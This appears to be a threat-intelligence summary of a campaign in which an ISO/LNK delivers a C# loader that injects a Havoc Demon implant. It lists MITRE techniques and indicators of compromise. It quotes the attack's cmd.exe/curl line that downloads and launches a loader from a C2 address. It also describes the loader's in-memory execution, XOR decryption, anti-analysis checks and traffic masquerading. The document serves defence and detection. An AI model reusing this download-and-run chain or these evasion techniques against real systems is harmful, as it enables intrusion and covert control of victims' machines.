Keypoints
- Malicious archive contained an ISO with a LNK that executed a cmd.exe command to fetch files via curl.
- Command downloaded Vipiska.doc (decoy) and OneDriveUpdater.exe (loader), then launched the loader and opened the decoy.
- OneDriveUpdater.exe is a C# PE32 loader that holds an encrypted payload and runs it in memory without a digital signature.
- Loader allocates and protects memory and creates a thread using VirtualAllocExNuma, VirtualProtect, and CreateThread to execute the payload.
- Anti-analysis checks included timing-based sleep verification and process-name validation before proceeding.
- The decrypted shellcode launched demon.x86.dll/demon.x64.dll β a Demon implant of the Havoc framework β which communicated with C2 servers (87.242.107[.]147:443, 87.242.107[.]224).
MITRE Techniques
- [T1059] Command-Line Interface β Executed a cmd command to download and run files using curl and start ( βcmd.exe /c curl hxxp://87.242.107[.]147/Vipiska.doc -o C:UsersPublicDocumentsVipiska.doc && curl hxxp://87.242.107[.]147/OneDriveUpdater.exe -o C:UsersPublicDownloadsOneDriveUpdater.exe && start /min /B C:UsersPublicDownloadsOneDriveUpdater.exe && start /B C:UsersPublicDocumentsVipiska.doc && taskkill /F /IM cmd.exeβ )
- [T1071] Application Layer Protocol β Used HTTP/HTTPS to retrieve payloads and communicate with C2 ( βPOSTβ and C2 87.242.107[.]147:443 )
- [T1055] Process Injection β Implanted the Demon payload into svchost.exe for execution ( βx86: βC:WindowsSysWOW64svchost.exeβ, x64: βC:WindowsSystem32svchost.exeββ )
- [T1027] Obfuscated Files or Information β Stored encrypted payloads and required a double XOR with 32βbyte keys to decrypt ( βdouble XOR with 32βbyte keysβ )
Indicators of Compromise
- [IP addresses/C2] C2 servers used to host payloads and accept POSTs β 87.242.107[.]147, 87.242.107[.]224 (port 443)
- [File names] Malicious and decoy files used in the attack β OneDriveUpdater.exe (loader), Vipiska.doc / Medical.doc (decoys), demon.x86.dll / demon.x64.dll (implant)
- [File hash] Sample loader SHA-256 β 189802cc7a8f5b8d260da48398835c9926b489fe0c1074e32dcf1fb3bad2e569
- [Host header / impersonation] HTTP header used to masquerade traffic β Host: microsoftonline[.]com
Opening the LNK triggered a single cmd.exe command that used curl to fetch a decoy document (saved as C:UsersPublicDocumentsVipiska.doc) and a loader executable (saved as C:UsersPublicDownloadsOneDriveUpdater.exe), then launched the loader and the decoy while terminating the cmd process. The loader is a C# PE32 binary bearing a OneDrive icon but lacking a signature; it contains encrypted x86 and x64 payload blobs that require a double XOR with 32βbyte keys to decrypt.
Once running, the loader allocates executable memory and launches the payload in-process: it calls VirtualAllocExNuma to allocate memory, VirtualProtect to set execution permissions, and CreateThread to start execution. The loader includes anti-analysis checks that verify sleep duration (terminating if execution resumed too quickly) and confirm the running process name equals OneDriveUpdater before proceeding to decrypt and run the shellcode.
The decrypted shellcode loads a DLL named demon.x86.dll or demon.x64.dll β a Demon implant from the Havoc framework β and injects/executes it in svchost.exe (x86: C:WindowsSysWOW64svchost.exe, x64: C:WindowsSystem32svchost.exe). The implant communicates with C2 infrastructure over POST to 87.242.107[.]147:443 (and related server 87.242.107[.]224), using headers that include a Microsoft-sounding Host value (microsoftonline[.]com). Analysis of those servers revealed additional malicious files and another loader sample with the same PDB path and the SHA-256 noted above.